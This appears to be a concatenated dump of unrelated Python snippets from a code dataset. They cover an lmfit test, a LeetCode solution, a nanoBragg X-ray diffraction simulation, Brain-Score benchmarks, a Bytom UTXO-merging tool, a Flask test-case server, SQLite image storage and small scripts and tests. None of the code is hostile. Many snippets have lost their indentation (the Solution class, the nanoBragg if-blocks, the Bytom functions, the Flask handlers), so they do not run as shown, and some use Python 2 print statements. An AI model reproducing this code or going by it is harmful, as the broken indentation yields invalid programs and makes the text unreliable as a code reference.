mod = GaussianModel(prefix='peak_') + LinearModel(prefix='bkg_')
pars = mod.make_params(peak_amplitude=21.0,
peak_center=7.0,
peak_sigma=2.0,
bkg_intercept=2,
bkg_slope=0.0)
out = mod.fit(y, pars, x=x, iter_cb=per_iteration)
assert(out.nfev == 23)
assert(out.aborted)
assert(not out.errorbars)
assert(not out.success)
| nilq/baby-python | python |
from typing import List
class Solution:
def maximum69Number (self, num: int) -> int:
ls = list('%d'%num)
ans = 0
try:
            index = ls.index('6')
            ls[index] = '9'
            for it in ls:
                ans = ans * 10 + int(it)
return ans
except ValueError as err:
ans = num
finally:
return ans
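# Illustrative check (not part of the original solution): 9669 has its first 6 flipped to 9.
if __name__ == "__main__":
    print(Solution().maximum69Number(9669))  # expected: 9969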
| nilq/baby-python | python |
from __future__ import absolute_import, division, print_function
from scitbx.array_family import flex # import dependency
from simtbx.nanoBragg import shapetype
from simtbx.nanoBragg import convention
from simtbx.nanoBragg import nanoBragg
import libtbx.load_env # possibly implicit
from cctbx import crystal
import os
# allow command-line options
GOFAST = False
import sys
if len(sys.argv)>1:
if sys.argv[1] == "fast":
print("SPEEDING UP! ")
GOFAST = True
# get the structure factor of spots
mtzfile = "model_nophase.mtz"
stolfile = "./bg.stol"
imgfile = "./F4_0_00008.mccd.gz"
# get stuff from the web if we have to
if not os.path.isfile(mtzfile):
from six.moves import urllib
url = "http://bl831.als.lbl.gov/~jamesh/simtbx/"+mtzfile
urllib.request.urlretrieve(url, mtzfile)
if not os.path.isfile(stolfile):
from six.moves import urllib
url = "http://bl831.als.lbl.gov/~jamesh/simtbx/bg.stol"
urllib.request.urlretrieve(url, stolfile)
if not os.path.isfile(imgfile):
from six.moves import urllib
url = "http://bl831.als.lbl.gov/~jamesh/simtbx/"+imgfile
urllib.request.urlretrieve(url, imgfile)
# make sure we got everything we need
assert os.path.isfile(mtzfile)
assert os.path.isfile(stolfile)
assert os.path.isfile(imgfile)
# read in structure factor amplitudes
from iotbx.reflection_file_reader import any_reflection_file
mtz_file = any_reflection_file(mtzfile)
Fhkl = mtz_file.as_miller_arrays()[0]
# get the structure factors of the background
Fbg_vs_stol = []
with open(stolfile, "r") as fp:
for i in fp.readlines():
tmp = i.split(" ")
try:
Fbg_vs_stol.append((float(tmp[0]), float(tmp[1])))
except Exception:pass
# now Fbg_vs_stol is a list of stol,Fbg tuples
# open the existing diffraction image: we need it for the background profile
import dxtbx
img = dxtbx.load(imgfile)
panel = img.get_detector()[0]
pixel_size_mm = panel.get_pixel_size()[0]
distance_mm = panel.get_distance()
#beam_center_mm =
# create the simulation
SIM = nanoBragg(img.get_detector(),img.get_beam(),verbose=6)
#SIM = nanoBragg(detpixels_slowfast=(4096,4096),pixel_size_mm=0.079346,verbose=9)
SIM.Fhkl = Fhkl
SIM.Fbg_vs_stol = Fbg_vs_stol
print(SIM.Fbg_vs_stol[1])
SIM.Fbg_vs_stol[1]=(0,0)
print(SIM.Fbg_vs_stol[1])
SIM.Fbg_vs_stol[1]=(0,0)
print(SIM.Fbg_vs_stol[1])
#from IPython import embed
#embed()
blarg = SIM.Fbg_vs_stol
blarg[1] = (0,0)
SIM.Fbg_vs_stol = blarg
print(SIM.Fbg_vs_stol[1])
# sigh, just keep going...
#exit()
print("beam_center_mm=",SIM.beam_center_mm)
print("XDS_ORGXY=",SIM.XDS_ORGXY)
print("detector_pivot=",SIM.detector_pivot)
print("beamcenter_convention=",SIM.beamcenter_convention)
print("fdet_vector=",SIM.fdet_vector)
print("sdet_vector=",SIM.sdet_vector)
print("odet_vector=",SIM.odet_vector)
print("beam_vector=",SIM.beam_vector)
print("polar_vector=",SIM.polar_vector)
print("spindle_axis=",SIM.spindle_axis)
print("twotheta_axis=",SIM.twotheta_axis)
print("distance_meters=",SIM.distance_meters)
print("distance_mm=",SIM.distance_mm)
print("close_distance_mm=",SIM.close_distance_mm)
print("detector_twotheta_deg=",SIM.detector_twotheta_deg)
print("detsize_fastslow_mm=",SIM.detsize_fastslow_mm)
print("detpixels_fastslow=",SIM.detpixels_fastslow)
print("detector_rot_deg=",SIM.detector_rot_deg)
print("curved_detector=",SIM.curved_detector)
print("pixel_size_mm=",SIM.pixel_size_mm)
print("point_pixel=",SIM.point_pixel)
print("polarization=",SIM.polarization)
print("nopolar=",SIM.nopolar)
print("oversample=",SIM.oversample)
print("region_of_interest=",SIM.region_of_interest)
print("wavelength_A=",SIM.wavelength_A)
print("energy_eV=",SIM.energy_eV)
print("fluence=",SIM.fluence)
print("flux=",SIM.flux)
print("exposure_s=",SIM.exposure_s)
print("beamsize_mm=",SIM.beamsize_mm)
print("dispersion_pct=",SIM.dispersion_pct)
print("dispsteps=",SIM.dispsteps)
print("divergence_hv_mrad=",SIM.divergence_hv_mrad)
print("divsteps_hv=",SIM.divsteps_hv)
print("divstep_hv_mrad=",SIM.divstep_hv_mrad)
print("round_div=",SIM.round_div)
print("phi_deg=",SIM.phi_deg)
print("osc_deg=",SIM.osc_deg)
print("phisteps=",SIM.phisteps)
print("phistep_deg=",SIM.phistep_deg)
print("detector_thick_mm=",SIM.detector_thick_mm)
print("detector_thicksteps=",SIM.detector_thicksteps)
print("detector_thickstep_mm=",SIM.detector_thickstep_mm)
print("mosaic_spread_deg=",SIM.mosaic_spread_deg)
print("mosaic_domains=",SIM.mosaic_domains)
print("indices=",SIM.indices)
print("amplitudes=",SIM.amplitudes)
print("Fhkl_tuple=",SIM.Fhkl_tuple)
print("default_F=",SIM.default_F)
print("interpolate=",SIM.interpolate)
print("integral_form=",SIM.integral_form)
# modify things that are missing, or not quite right in the header
SIM.close_distance_mm=299.83
SIM.wavelength_A=1.304735
SIM.polarization=0.99
SIM.beamsize_mm=0.03
#SIM.fluence=4.28889e+18
# fluence scaled to make crystal look bigger
SIM.fluence=1.03e+27
SIM.beamcenter_convention=convention.Custom
SIM.beam_center_mm=( 160.53, 182.31 )
SIM.dispersion_pct = 0.5
SIM.dispsteps=6
print("dispsteps=",SIM.dispsteps)
SIM.divergence_hv_mrad = ( 0.02, 0.02 )
SIM.divsteps_hv = ( 2 , 2 )
print(SIM.divsteps_hv)
SIM.round_div=True
print(SIM.divsteps_hv)
#SIM.detector_thick_mm = 0.037
SIM.detector_thick_mm = 0.
SIM.detector_thicksteps = 1
# override mtz unit cell
SIM.unit_cell_tuple = ( 68.78, 169.26, 287.42, 90, 90, 90 )
#SIM.Ncells_abc = ( 1, 1, 1 )
SIM.Ncells_abc = ( 14, 6, 4 )
#SIM.Ncells_abc = ( 35, 15, 10 )
print("Ncells_abc=",SIM.Ncells_abc)
SIM.xtal_shape=shapetype.Tophat
print("xtal_size_mm=",SIM.xtal_size_mm)
SIM.interpolate=0
SIM.progress_meter=True
SIM.mosaic_spread_deg = 0.2
SIM.mosaic_domains = 30
SIM.oversample = 1
SIM.detector_psf_type=shapetype.Fiber
SIM.adc_offset_adu = 10
SIM.readout_noise_adu = 1.5
SIM.show_sources()
# speedups, comment out for realism
if GOFAST:
SIM.divergence_hv_mrad = ( 0,0 )
SIM.dispersion_pct = 0
SIM.mosaic_spread_deg = 0
# set this to 0 or -1 to trigger automatic radius. could be very slow with bright images
SIM.detector_psf_kernel_radius_pixels=5;
# use one pixel for diagnostics?
SIM.printout_pixel_fastslow=(1782,1832)
# debug only a little patch
#SIM.region_of_interest=((1450,1850),(1550,1950))
SIM.amorphous_sample_thick_mm = 0.1
SIM.amorphous_density_gcm3 = 7e-7
SIM.amorphous_sample_molecular_weight_Da = 18 # default
# load in the real image so we can extract the background
SIM.raw_pixels = img.get_raw_data().as_double()
#print SIM.Fbg_vs_stol[100]
SIM.extract_background()
#print SIM.Fbg_vs_stol[100]
# maybe edit background trace here?
# or, forget it, reset to old one:
SIM.Fbg_vs_stol = Fbg_vs_stol
# now clear the pixels
SIM.raw_pixels*=0;
print("dispsteps=",SIM.dispsteps)
print("divsteps=",SIM.divsteps_hv)
print("oversample=",SIM.oversample)
SIM.add_background(oversample=1,source=0)
print("mid_sample=",SIM.raw_pixels[1782,1832])
print("dispsteps=",SIM.dispsteps)
print("divsteps=",SIM.divsteps_hv)
print("oversample=",SIM.oversample)
SIM.to_smv_format(fileout="intimage_001.img",intfile_scale=1)
# three clusters of mosaic domains
if GOFAST == False:
SIM.fluence /= 3
SIM.missets_deg = ( 96.9473, -52.0932, -32.518 )
#SIM.missets_deg = ( 96.544, -51.9673, -32.4243 )
SIM.add_nanoBragg_spots()
SIM.to_smv_format(fileout="intimage_002.img",intfile_scale=1)
SIM.missets_deg = ( 97.5182, -52.3404, -32.7289 )
SIM.add_nanoBragg_spots()
SIM.to_smv_format(fileout="intimage_003.img",intfile_scale=1)
SIM.missets_deg = ( 97.1251, -52.2242, -32.751 )
SIM.add_nanoBragg_spots()
SIM.to_smv_format(fileout="intimage_004.img",intfile_scale=1)
SIM.detector_psf_fwhm_mm=0.08;
SIM.detector_psf_type=shapetype.Fiber
# get same noise each time this test is run
SIM.seed = 1
print("seed=",SIM.seed)
print("calib_seed=",SIM.calib_seed)
print("quantum_gain=",SIM.quantum_gain)
print("adc_offset_adu=",SIM.adc_offset_adu)
print("detector_calibration_noise_pct=",SIM.detector_calibration_noise_pct)
print("flicker_noise_pct=",SIM.flicker_noise_pct)
print("readout_noise_adu=",SIM.readout_noise_adu)
print("detector_psf_type=",SIM.detector_psf_type)
print("detector_psf_fwhm_mm=",SIM.detector_psf_fwhm_mm)
print("detector_psf_kernel_radius_pixels=",SIM.detector_psf_kernel_radius_pixels)
SIM.show_params()
SIM.add_noise()
print("raw_pixels=",SIM.raw_pixels)
SIM.to_smv_format(fileout="noiseimage_001.img",intfile_scale=1)
print("mosaic_domains=",SIM.mosaic_domains)
print("mosaic_spread_deg=",SIM.mosaic_spread_deg)
print("dispersion_pct=",SIM.dispersion_pct)
print("dispsteps=",SIM.dispsteps)
print("divergence_hv_mrad=",SIM.divergence_hv_mrad)
print("divergence_hv=",SIM.divsteps_hv)
print("GOT HERE 1")
SIM.verbose=999
SIM.free_all()
print("GOT HERE 2")
| nilq/baby-python | python |
import brainscore
from brainscore.benchmarks._neural_common import NeuralBenchmark, average_repetition
from brainscore.metrics.ceiling import InternalConsistency, RDMConsistency
from brainscore.metrics.rdm import RDMCrossValidated
from brainscore.metrics.regression import CrossRegressedCorrelation, pls_regression, pearsonr_correlation, \
single_regression
from brainscore.utils import LazyLoad
from result_caching import store
VISUAL_DEGREES = 4
NUMBER_OF_TRIALS = 20
def _MovshonFreemanZiemba2013Region(region, identifier_metric_suffix, similarity_metric, ceiler):
assembly_repetition = LazyLoad(lambda region=region: load_assembly(False, region=region))
assembly = LazyLoad(lambda region=region: load_assembly(True, region=region))
return NeuralBenchmark(identifier=f'movshon.FreemanZiemba2013.{region}-{identifier_metric_suffix}', version=2,
assembly=assembly, similarity_metric=similarity_metric, parent=region,
ceiling_func=lambda: ceiler(assembly_repetition),
visual_degrees=VISUAL_DEGREES, number_of_trials=NUMBER_OF_TRIALS,
paper_link='https://www.nature.com/articles/nn.3402')
def MovshonFreemanZiemba2013V1PLS():
return _MovshonFreemanZiemba2013Region('V1', identifier_metric_suffix='pls',
similarity_metric=CrossRegressedCorrelation(
regression=pls_regression(), correlation=pearsonr_correlation(),
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=InternalConsistency())
def MovshonFreemanZiemba2013V1Single():
return _MovshonFreemanZiemba2013Region('V1', identifier_metric_suffix='single',
similarity_metric=CrossRegressedCorrelation(
regression=single_regression(), correlation=pearsonr_correlation(),
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=InternalConsistency())
def MovshonFreemanZiemba2013V1RDM():
return _MovshonFreemanZiemba2013Region('V1', identifier_metric_suffix='rdm',
similarity_metric=RDMCrossValidated(
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=RDMConsistency())
def MovshonFreemanZiemba2013V2PLS():
return _MovshonFreemanZiemba2013Region('V2', identifier_metric_suffix='pls',
similarity_metric=CrossRegressedCorrelation(
regression=pls_regression(), correlation=pearsonr_correlation(),
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=InternalConsistency())
def MovshonFreemanZiemba2013V2RDM():
return _MovshonFreemanZiemba2013Region('V2', identifier_metric_suffix='rdm',
similarity_metric=RDMCrossValidated(
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=RDMConsistency())
@store()
def load_assembly(average_repetitions, region, access='private'):
assembly = brainscore.get_assembly(f'movshon.FreemanZiemba2013.{access}')
assembly = assembly.sel(region=region)
assembly = assembly.stack(neuroid=['neuroid_id']) # work around xarray multiindex issues
assembly['region'] = 'neuroid', [region] * len(assembly['neuroid'])
assembly.load()
time_window = (50, 200)
assembly = assembly.sel(time_bin=[(t, t + 1) for t in range(*time_window)])
assembly = assembly.mean(dim='time_bin', keep_attrs=True)
assembly = assembly.expand_dims('time_bin_start').expand_dims('time_bin_end')
assembly['time_bin_start'], assembly['time_bin_end'] = [time_window[0]], [time_window[1]]
assembly = assembly.stack(time_bin=['time_bin_start', 'time_bin_end'])
assembly = assembly.squeeze('time_bin')
assembly = assembly.transpose('presentation', 'neuroid')
if average_repetitions:
assembly = average_repetition(assembly)
return assembly
| nilq/baby-python | python |
import json, time, argparse, getpass, re, requests
try:
input = raw_input
except NameError:
pass
parser = argparse.ArgumentParser(description='Bytom UTXO Tool')
parser.add_argument('-o', '--url', default='http://127.0.0.1:9888', dest='endpoint', help='API endpoint')
parser.add_argument('--http-user', default=None, dest='http_user', help='HTTP Basic Auth Username')
parser.add_argument('--http-pass', default=None, dest='http_pass', help='HTTP Basic Auth Password')
parser.add_argument('--cert', default=None, dest='https_cert', help='HTTPS Client Certificate')
parser.add_argument('--key', default=None, dest='https_key', help='HTTPS Client Key')
parser.add_argument('--ca', default=None, dest='https_ca', help='HTTPS CA Certificate')
parser.add_argument('--no-verify', action='store_true', dest='https_verify', help='Do not verify HTTPS server certificate')
parser.add_argument('-p', '--pass', default=None, dest='bytom_pass', help='Bytom Account Password')
parser.add_argument('-l', '--list', action='store_true', dest='only_list', help='Show UTXO list without merge')
parser.add_argument('-m', '--merge', default=None, dest='merge_list', help='UTXO to merge')
parser.add_argument('-a', '--address', default=None, dest='address', help='Transfer address')
parser.add_argument('-y', '--yes', action='store_true', dest='confirm', help='Confirm transfer')
class BytomException(Exception):
pass
class JSONRPCException(Exception):
pass
class Callable(object):
def __init__(self, name, func):
self.name = name
self.func = func
def __call__(self, *args, **kwargs):
return self.func(self.name, *args, **kwargs)
class JSONRPC(object):
def __init__(self, endpoint, httpverb='POST', **kwargs):
self.url = endpoint.rstrip('/')
self.httpverb = httpverb
self.kwargs = kwargs
def __getattr__(self, name):
return Callable(name.replace('_', '-'), self.callMethod)
def callMethod(self, method, params={}):
m = requests.request(self.httpverb, '{}/{}'.format(self.url, method), json=params, **self.kwargs)
data = m.json()
if data.get('status') == 'success':
return data['data']
raise JSONRPCException(data.get('msg') or data.get('message') or str(data))
def send_tx(bytomd, utxo_list, to_address, password):
actions = []
amount = 0
for utxo in utxo_list:
actions.append({
'type': 'spend_account_unspent_output',
'output_id': utxo['id'],
})
amount += utxo['amount']
actions.append({
'amount': amount,
'asset_id': 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff',
'type': 'control_address',
'address': to_address,
})
transaction = bytomd.build_transaction({
'base_transaction' : None,
'actions' : actions,
'ttl' : 1
})
gas_info = bytomd.estimate_transaction_gas({
'transaction_template': transaction
})
fee = gas_info['total_neu']
actions[-1]['amount'] -= fee
time.sleep(1)
transaction = bytomd.build_transaction({
'base_transaction': None,
'actions': actions,
'ttl': 1,
})
signed_transaction = bytomd.sign_transaction({
'transaction': transaction,
'password': password,
})
if signed_transaction['sign_complete']:
raw_transaction = signed_transaction['transaction']['raw_transaction']
result = bytomd.submit_transaction({'raw_transaction': raw_transaction})
return result['tx_id']
else:
raise BytomException('Sign not complete')
def parse_id_list(id_list_str, list_all):
for id_str in id_list_str.split(','):
id_ = id_str.strip()
if not id_:
pass
elif id_.strip().lower() == 'all':
for i in list_all:
yield i
return
        elif re.match(r'(\d+)-(\d+)', id_):
            start, end = re.match(r'(\d+)-(\d+)', id_).groups()
for i in range(int(start), int(end) + 1):
yield i
elif not id_.strip().isdigit():
print('Ignored: Incorrect index {}'.format(id_))
else:
idx = int(id_.strip())
yield idx
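# Illustrative sketch (not part of the original tool; the input string is made up):
# parse_id_list expands comma-separated indices and ranges before main() filters them.
def _example_parse_id_list():
    return list(parse_id_list('0,2,4-6', range(10)))  # -> [0, 2, 4, 5, 6]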
def main():
options = parser.parse_args()
api_params = {}
if options.http_user and options.http_pass:
api_params['auth'] = (options.http_user, options.http_pass)
if options.https_cert:
if options.https_key:
api_params['cert'] = (options.https_cert, options.https_key)
else:
api_params['cert'] = options.https_cert
if options.https_ca:
api_params['verify'] = options.https_ca
elif options.https_verify:
api_params['verify'] = False
bytomd = JSONRPC(options.endpoint, **api_params)
utxolist = bytomd.list_unspent_outputs()
current_block = bytomd.get_block_count()['block_count']
for i, utxo in enumerate(utxolist):
print('{:4}. {:13.8f} BTM {}{}'.format(i, utxo['amount'] / 1e8, utxo['id'], ' (not mature)' if utxo['valid_height'] > current_block else ''))
if options.only_list:
return
utxo_idlist = options.merge_list or input('Merge UTXOs (1,3,5 or 1-10 or all): ')
utxo_mergelist = []
utxo_idset = set()
for idx in parse_id_list(utxo_idlist, range(len(utxolist))):
if idx in utxo_idset:
print('Ignored: Duplicate index {}'.format(idx))
elif not 0 <= idx < len(utxolist):
print('Ignored: Index out of range {}'.format(idx))
elif utxolist[idx]['valid_height'] > current_block:
print('Ignored: UTXO[{}] not mature'.format(idx))
else:
utxo_mergelist.append(utxolist[idx])
utxo_idset.add(idx)
if len(utxo_mergelist) < 2:
print('Not Merge UTXOs, Exit...')
return
print('To merge {} UTXOs with {:13.8f} BTM'.format(len(utxo_mergelist), sum(utxo['amount'] for utxo in utxo_mergelist) / 1e8))
if not options.address:
options.address = input('Transfer Address: ')
if not options.bytom_pass:
options.bytom_pass = getpass.getpass('Bytom Account Password: ')
if not (options.confirm or input('Confirm [y/N] ').lower() == 'y'):
print('Not Merge UTXOs, Exit...')
return
print(send_tx(bytomd, utxo_mergelist, options.address, options.bytom_pass))
if __name__ == '__main__':
main()
| nilq/baby-python | python |
S = set()
S.add(5)
S.add(3)
S.add(1)
# Prints out the numbers 5, 3, 1 in no particular order
for element in S:
print "{} is in the set".format(element)
S.remove(3)
S.remove(5)
S.remove(1)
| nilq/baby-python | python |
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module serving all the traffic for javascript test cases."""
import os
from flask import abort
from flask import Blueprint
from flask import make_response
from flask import render_template
from flask import Response
from flask import send_from_directory
from flask import url_for
javascript_module = Blueprint(
"javascript_module", __name__, template_folder="templates")
# Global app.instance_path is not accessible from blueprints ¯\_(ツ)_/¯.
TEST_CASES_PATH = os.path.abspath(__file__ + "/../../../test-cases/javascript/")
@javascript_module.route("/misc/comment.js")
def comment():
content = "// " + url_for(
"index", _external=True) + "test/javascript/misc/comment.found"
r = make_response(content, 200)
r.headers["Content-Type"] = "application/javascript"
return r
@javascript_module.route("/misc/string-variable.js")
def string_variable():
content = "var url = \"" + url_for(
"index", _external=True) + "test/javascript/misc/string-variable.found\";"
r = make_response(content, 200)
r.headers["Content-Type"] = "application/javascript"
return r
@javascript_module.route("/frameworks/angular/")
def angular_root():
# Redirect straight to the Angular app entry point.
r = Response(status=301)
r.headers["Location"] = "/javascript/frameworks/angular/index.html"
return r
@javascript_module.route("/frameworks/polymer/")
def polymer_root():
# Redirect straight to the Polymer app entry point.
r = Response(status=301)
r.headers["Location"] = "/javascript/frameworks/polymer/index.html"
return r
@javascript_module.route("/frameworks/react/")
def react_root():
# Redirect straight to the React app entry point.
r = Response(status=301)
r.headers["Location"] = "/javascript/frameworks/react/index.html"
return r
@javascript_module.route("/misc/string-concat-variable.js")
def string_concat_variable():
content = "var domain = \"" + url_for(
"index", _external=True
) + ("\";var path = \"test/javascript/misc/string-concat-variable.found\";var"
" full = domain + path;")
r = make_response(content, 200)
r.headers["Content-Type"] = "application/javascript"
return r
@javascript_module.route("/", defaults={"path": ""})
@javascript_module.route("/<path:path>")
def html_dir(path):
"""Lists contents of requested directory."""
requested_path = os.path.join(TEST_CASES_PATH, path)
if not os.path.exists(requested_path):
return abort(404)
if os.path.isdir(requested_path):
files = os.listdir(requested_path)
return render_template("list-javascript-dir.html", files=files, path=path)
if os.path.isfile(requested_path):
return send_from_directory("test-cases/javascript", path)
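# Minimal wiring sketch (assumption: the real application defines an "index" endpoint and
# mounts this blueprint under /javascript, which is what the redirects above point at).
if __name__ == "__main__":
    from flask import Flask
    app = Flask(__name__)

    @app.route("/")
    def index():
        return "test-case index"

    app.register_blueprint(javascript_module, url_prefix="/javascript")
    app.run(debug=True)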
| nilq/baby-python | python |
import sqlite3
import os.path
from os import listdir, getcwd
import sys
from os.path import isfile, join
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
db_dir = os.path.join(BASE_DIR,"sql/")
img_dir = os.path.join(BASE_DIR,"images/")
full_dir = lambda x,y: x+y
known_faces_imgs = full_dir(img_dir,'known_faces/')
new_faces_imgs = full_dir(img_dir,'new_faces/')
imgs1 = [f for f in listdir(known_faces_imgs) if isfile(join(known_faces_imgs, f))]
imgs2 = [f for f in listdir(new_faces_imgs) if isfile(join(new_faces_imgs, f))]
# download 2 images for testing
'''
import urllib.request
def store_image(url, local_file_name):
with urllib.request.urlopen(url) as resource:
with open(local_file_name, 'wb') as f:
f.write(resource.read())
store_image('https://upload.wikimedia.org/wikipedia/commons/2/25/Chris_Evans_SDCC_2014.jpg',
'1.jpg')
store_image('https://img.buzzfeed.com/buzzfeed-static/static/2018-01/11/18/campaign_images/buzzfeed-prod-fastlane-01/chris-evans-uses-nothing-on-his-beard-its-just-th-2-20079-1515714803-5_dblbig.jpg',
'2.jpg')
'''
def codb(db_file):
db_file = full_dir(db_dir,db_file)
print(db_file)
db_is_new = not os.path.exists(db_file)
conn = sqlite3.connect(db_file)
if db_is_new:
print (db_file,"DONE")
sql = "create table if not exists elements ("
sql +="ID INTEGER PRIMARY KEY AUTOINCREMENT,"
sql+="IMAGE BLOB,TYPE TEXT,NOM TEXT);"
conn.execute(sql)
else:
print ("Schema exists")
        print()
return conn
def insert_picture(db,imgs):
conn = codb(db)
for i in imgs:
picture_file=full_dir(full_dir(img_dir,db+"/"),i)
with open(picture_file, 'rb') as input_file:
ablob = input_file.read()
base=os.path.basename(picture_file)
afile, ext = os.path.splitext(base)
sql = "INSERT INTO elements"
sql+="(IMAGE, TYPE,NOM) VALUES(?, ?,?);"
conn.execute(sql,[sqlite3.Binary(ablob), ext, afile])
conn.commit()
conn.close()
def make_new():
#db1
insert_picture('known_faces',imgs1)
#db2
insert_picture('new_faces',imgs2)
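# Illustrative sketch (not part of the original script): read the stored blobs back out of
# the `elements` table and write them next to the images directory; the file name is
# rebuilt from the NOM and TYPE columns.
def dump_pictures(db):
    conn = codb(db)
    for _row_id, ablob, ext, name in conn.execute("SELECT ID, IMAGE, TYPE, NOM FROM elements"):
        with open(full_dir(img_dir, name + ext), 'wb') as output_file:
            output_file.write(ablob)
    conn.close()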
| nilq/baby-python | python |
data = open('data/input6.txt', 'r')
orbs = data.readlines()
d = {}
for orb in orbs:
c1 = orb[:3]
c2 = orb[4:7]
d[c2] = c1
s = 0
for p in d:
curr_p = p
while curr_p in d:
curr_p = d[curr_p]
s += 1
print(s)
trajet_you = []
curr = 'YOU'
while True:
if curr not in d: break
curr = d[curr]
trajet_you += [curr]
i = 0
curr = 'SAN'
while True:
i += 1
curr = d[curr]
if curr in trajet_you:break
print(trajet_you.index(curr) + i - 1)
| nilq/baby-python | python |
#! /usr/bin/env python
#
# Check the option usage.
# Make sure the union member matches the option type.
#
import sys, os, fnmatch
# just use the first letter of the member name - should be unique
opt_suffix = {
'b' : 'AT_BOOL',
'a' : 'AT_IARF',
'n' : 'AT_NUM',
'l' : 'AT_LINE',
't' : 'AT_POS'
}
opts = { }
def check_file (fn):
problems = 0
fd = open(fn, 'r')
line_no = 0
for line in fd:
line_no = line_no + 1
cpd = line.find('cpd.settings[UO_')
if cpd > 0:
sb = line[cpd:].find(']')
opt = line[cpd + 13 : cpd + sb]
mem = line[cpd + sb + 2]
if opt in opts and mem in opt_suffix:
if opts[opt] != opt_suffix[mem]:
print fn + '[%d]' % (line_no) , opt, 'should use', opts[opt], 'not', opt_suffix[mem]
problems += 1
return problems
def main (argv):
# Read in all the options
of = open(os.path.join('src', 'options.cpp'), 'r');
for line in of:
if line.find('unc_add_option') > 0 and line.find('UO_') > 0:
ps = line.split(',')
if len(ps) >= 3:
opts[ps[1].strip()] = ps[2].strip()
of.close()
# Get a list of all the source files
ld = os.listdir('src')
src_files = fnmatch.filter(ld, '*.cpp')
src_files.extend(fnmatch.filter(ld, '*.h'))
# Check each source file
problems = 0
for fn in src_files:
problems += check_file(os.path.join('src', fn))
if problems == 0:
print 'No problems found'
if __name__ == '__main__':
main(sys.argv)
| nilq/baby-python | python |
from pathlib import Path
import pytest
from md_translate.exceptions import ObjectNotFoundException, FileIsNotMarkdown
from md_translate.files_worker import FilesWorker
TEST_FIRST_FILE = 'tests/test_data/md_files_folder/first_file.md'
TEST_SECOND_FILE = 'tests/test_data/md_files_folder/second_file.md'
class SettingsMock:
def __init__(self, path):
self.path = Path('tests/test_data').joinpath(path)
class TestFilesWorker:
@pytest.mark.parametrize('path, err', [
['not existing folder', ObjectNotFoundException],
['folder_without_md_files', FileNotFoundError],
['not_a_folder', FileIsNotMarkdown],
['not_markdown_file.txt', FileIsNotMarkdown],
])
def test_folder_errors(self, path, err):
with pytest.raises(err):
FilesWorker(SettingsMock(path)).get_md_files()
def test_multiple_objects(self):
file_worker_object = FilesWorker(SettingsMock('md_files_folder'))
assert file_worker_object.single_file == False
assert sorted(file_worker_object.get_md_files()) == [Path(TEST_FIRST_FILE), Path(TEST_SECOND_FILE)]
def test_single_object(self):
file_worker_object = FilesWorker(SettingsMock('md_files_folder/first_file.md'))
assert file_worker_object.single_file == True
assert file_worker_object.get_md_files() == [Path(TEST_FIRST_FILE)]
| nilq/baby-python | python |
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.page import page as page_module
from telemetry.page import page_set as page_set_module
class Top20Page(page_module.Page):
def __init__(self, url, page_set, name=''):
super(Top20Page, self).__init__(url=url, page_set=page_set, name=name)
self.archive_data_file = '../data/chrome_proxy_top_20.json'
class Top20PageSet(page_set_module.PageSet):
""" Pages hand-picked for Chrome Proxy tests. """
def __init__(self):
super(Top20PageSet, self).__init__(
archive_data_file='../data/chrome_proxy_top_20.json')
# Why: top google property; a google tab is often open
self.AddPage(Top20Page('https://www.google.com/#hl=en&q=barack+obama',
self))
# Why: #3 (Alexa global)
self.AddPage(Top20Page('http://www.youtube.com', self))
# Why: #18 (Alexa global), Picked an interesting post
self.AddPage(Top20Page(
# pylint: disable=C0301
'http://en.blog.wordpress.com/2012/09/04/freshly-pressed-editors-picks-for-august-2012/',
self, 'Wordpress'))
# Why: top social,Public profile
self.AddPage(Top20Page('http://www.facebook.com/barackobama', self,
'Facebook'))
# Why: #12 (Alexa global),Public profile
self.AddPage(Top20Page('http://www.linkedin.com/in/linustorvalds', self,
'LinkedIn'))
# Why: #6 (Alexa) most visited worldwide,Picked an interesting page
self.AddPage(Top20Page('http://en.wikipedia.org/wiki/Wikipedia', self,
'Wikipedia (1 tab)'))
# Why: #8 (Alexa global),Picked an interesting page
self.AddPage(Top20Page('https://twitter.com/katyperry', self, 'Twitter'))
# Why: #37 (Alexa global)
self.AddPage(Top20Page('http://pinterest.com', self, 'Pinterest'))
# Why: #1 sports
self.AddPage(Top20Page('http://espn.go.com', self, 'ESPN'))
# Why: #1 news worldwide (Alexa global)
self.AddPage(Top20Page('http://news.yahoo.com', self))
# Why: #2 news worldwide
self.AddPage(Top20Page('http://www.cnn.com', self))
# Why: #7 (Alexa news); #27 total time spent,Picked interesting page
self.AddPage(Top20Page(
'http://www.weather.com/weather/right-now/Mountain+View+CA+94043',
self, 'Weather.com'))
# Why: #1 world commerce website by visits; #3 commerce in the US by time
# spent
self.AddPage(Top20Page('http://www.amazon.com', self))
# Why: #1 commerce website by time spent by users in US
self.AddPage(Top20Page('http://www.ebay.com', self))
# Why: #1 games according to Alexa (with actual games in it)
self.AddPage(Top20Page('http://games.yahoo.com', self))
# Why: #1 Alexa recreation
self.AddPage(Top20Page('http://booking.com', self))
# Why: #1 Alexa reference
self.AddPage(Top20Page('http://answers.yahoo.com', self))
# Why: #1 Alexa sports
self.AddPage(Top20Page('http://sports.yahoo.com/', self))
# Why: top tech blog
self.AddPage(Top20Page('http://techcrunch.com', self))
self.AddPage(Top20Page('http://www.nytimes.com', self))
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
##
# @file backend.py
# @brief
# @author wondereamer
# @version 0.5
# @date 2016-07-10
from quantity.digger.event.rpc import EventRPCServer
from quantity.digger.event.eventengine import ZMQEventEngine
from quantity.digger.interaction.interface import BackendInterface
from quantity.digger.util import mlogger as log
from quantity.digger.datasource.data import DataManager
from quantity.digger.datastruct import PContract
